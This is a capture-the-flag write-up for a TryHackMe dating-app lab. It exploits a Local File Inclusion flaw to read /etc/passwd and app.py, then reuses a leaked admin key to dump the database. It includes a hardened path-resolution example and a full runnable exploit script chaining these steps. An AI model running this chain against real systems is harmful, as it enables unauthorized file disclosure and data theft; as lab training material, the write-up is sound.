ValenFind


🌐 Love at First Breach 2026 - Valenfind

Category: 🌐 Web
Author: TryHackMe

Challenge Prompt

My Dearest Hacker,

There’s this new dating app called “Valenfind” that just popped up out of nowhere. I hear the creator only learned to code this year; surely this must be vibe-coded. Can you exploit it?

You can access it here: http://MACHINE_IP:5000

Problem Type

  • Local File Inclusion (LFI)

Solve

We start with a quick nmap scan of the target port to see what is listening there:
nmap -p 5000 -T4 -A IP_ADDRESS

The service fingerprint shows a Python HTTP server, so this is most likely a Flask app.

Next we visit the site as instructed. On load we are greeted by the ValenFind landing page.

Clicking the Start Your Journey button lets us create an account.

I used a for my username and password123, just so it was easy to remember. We are then taken to complete our profile. Fill it out and click Finish Profile & Start Dating.

On the next page we are given Potential Matches. Scrolling through the list, the Cupid user stands out with 999 likes.

If we click the Profile button, we see that this user “Keeps the Database Secure”.

Let’s see if there is anything interesting here. Right-click and pick “View Page Source”; part way down in the JavaScript there is a comment labelled Vulnerability.

It seems the layout parameter allows Local File Inclusion (LFI)! Let’s fire up Burp Suite and see if we can exploit it.

I use FoxyProxy in Firefox, but Burp's built-in browser works just as well. Send a request with intercept on, then forward it to Repeater so we can modify it.

Since I captured a POST request, I changed it to a GET and set the path we want to abuse: /api/fetch_layout?layout=. Testing with /etc/passwd works: the server returns the contents of the file.

Next I sent something that should not resolve to a file, just two periods (..). The response is an error that it couldn’t load /opt/Valenfind/templates/components/.., where the trailing .. is exactly what we sent. That error message discloses the directory the layouts are read from, which is the foothold we need to locate the application source.
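The two observations above (an absolute path like /etc/passwd is served as-is, and a bare .. is echoed back un-normalised in the error) are both consistent with the layout name simply being joined onto the components directory. The following is an added example, not code from the Valenfind app: a naive join that behaves like the observed endpoint, beside a hardened resolver that canonicalises the path and proves it still sits under the base directory. The base directory is the one disclosed in the error message; the function names are my own.

```python
import os

# Directory disclosed by the "couldn't load ..." error message in the writeup.
COMPONENTS_DIR = "/opt/Valenfind/templates/components"


def vulnerable_resolve(base_dir: str, layout: str) -> str:
    """Naive join of a user-controlled name onto the template directory.

    Illustrative model of the observed behaviour, not the app's real code.
    os.path.join drops base_dir entirely when the second argument is absolute
    (so '/etc/passwd' is read verbatim) and never normalises '..', which is
    why the error echoed '.../components/..' exactly as sent.
    """
    return os.path.join(base_dir, layout)


def safe_resolve(base_dir: str, layout: str) -> str:
    """Hardened variant: canonicalise, then prove the result stays under base_dir."""
    if not layout or os.path.isabs(layout) or "\x00" in layout:
        raise ValueError("invalid layout name")
    root = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(root, layout))
    # commonpath is the containment check to use; a bare startswith(root)
    # would also accept '/opt/Valenfind/templates/components-evil/x'.
    if os.path.commonpath([root, candidate]) != root:
        raise ValueError("layout escapes the template directory")
    return candidate


def escapes(base_dir: str, layout: str) -> bool:
    """True if the hardened resolver rejects the name."""
    try:
        safe_resolve(base_dir, layout)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    probes = ("card.html", "..", "../../app.py", "/etc/passwd", "/opt/Valenfind/app.py")
    for probe in probes:
        print(f"{probe:24} naive -> {vulnerable_resolve(COMPONENTS_DIR, probe)}")
        verdict = "REJECTED" if escapes(COMPONENTS_DIR, probe) else "ok"
        print(f"{'':24} safe  -> {verdict}")
```

Note that realpath is used rather than normpath so a symlink planted inside the template directory cannot point back out of it; the commonpath comparison is what actually enforces containment, and the isabs check up front is what closes the /etc/passwd route.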

Then we take the disclosed path and append app.py, since, as we found at the start, this may be a Flask app. That results in an error that the file was not found.

I worked my way up the directory tree until /opt/Valenfind/app.py returned the source. On line 17 we see an admin API key, ADMIN_API_KEY, hard-coded in the application source!

As I read through the rest of the code, on line 229 I found an export_db API function. It requires a special header (line 231), X-Valentine-Token, whose value must match the ADMIN_API_KEY (line 233) we found above.

Sending that header with the key taken from app.py gives us the flag!
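The whole chain (read app.py through the layout parameter, pull out ADMIN_API_KEY, replay it in X-Valentine-Token) as one script, added here as an example and not part of the original writeup. The /api/fetch_layout endpoint, the header name, the ADMIN_API_KEY variable and the /opt/Valenfind/app.py path are from the writeup; the export_db route path (/api/export_db), its use of GET, and the assumption that the key is a one-line string literal are mine. SAMPLE_APP_PY is a constructed stand-in for the leaked source so the extraction step can be checked offline.

```python
import argparse
import re
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

# fetch_layout and the X-Valentine-Token header are from the writeup. The
# export_db route path and its HTTP method are assumptions: the page only
# names the view function, not the URL it is mounted on.
FETCH_LAYOUT = "/api/fetch_layout"
EXPORT_DB = "/api/export_db"
TOKEN_HEADER = "X-Valentine-Token"
APP_SOURCE = "/opt/Valenfind/app.py"

# Matches an `ADMIN_API_KEY = "..."` assignment at the start of a line, so a
# commented-out copy of the key does not win over the live one.
KEY_PATTERN = re.compile(r'^\s*ADMIN_API_KEY\s*=\s*["\']([^"\']+)["\']', re.MULTILINE)

# Constructed stand-in for the leaked source, used for offline checks only.
SAMPLE_APP_PY = """from flask import Flask, request

app = Flask(__name__)
ADMIN_API_KEY = "example-key-not-the-real-one"
"""


def fetch_layout(base_url: str, layout: str, timeout: float = 10) -> str:
    """Read a file through the unsanitised layout parameter and return its body."""
    query = urllib.parse.urlencode({"layout": layout})
    url = f"{base_url}{FETCH_LAYOUT}?{query}"
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def extract_admin_key(source: str) -> Optional[str]:
    """Pull the ADMIN_API_KEY literal out of leaked Python source, or None."""
    match = KEY_PATTERN.search(source)
    return match.group(1) if match else None


def export_db(base_url: str, api_key: str, timeout: float = 10) -> str:
    """Call export_db with the admin key in the header the function checks."""
    req = urllib.request.Request(f"{base_url}{EXPORT_DB}", headers={TOKEN_HEADER: api_key})
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


def main(argv=None) -> int:
    parser = argparse.ArgumentParser(description="Valenfind LFI -> ADMIN_API_KEY -> export_db")
    parser.add_argument("base_url", help="e.g. http://MACHINE_IP:5000")
    args = parser.parse_args(argv)
    base = args.base_url.rstrip("/")
    try:
        source = fetch_layout(base, APP_SOURCE)
    except urllib.error.HTTPError as exc:
        print(f"fetch_layout failed: HTTP {exc.code}", file=sys.stderr)
        return 1
    key = extract_admin_key(source)
    if key is None:
        print("ADMIN_API_KEY not found in fetched source; check the path", file=sys.stderr)
        return 1
    print(f"[+] ADMIN_API_KEY = {key}")
    print(export_db(base, key))
    return 0


if __name__ == "__main__":
    sys.exit(main())
```

Run it as python3 valenfind.py http://MACHINE_IP:5000; if export_db lives on a different route or expects POST, only the two constants at the top need changing. The first request fails fast on a 404, which is the same signal the writeup used when walking the path by hand.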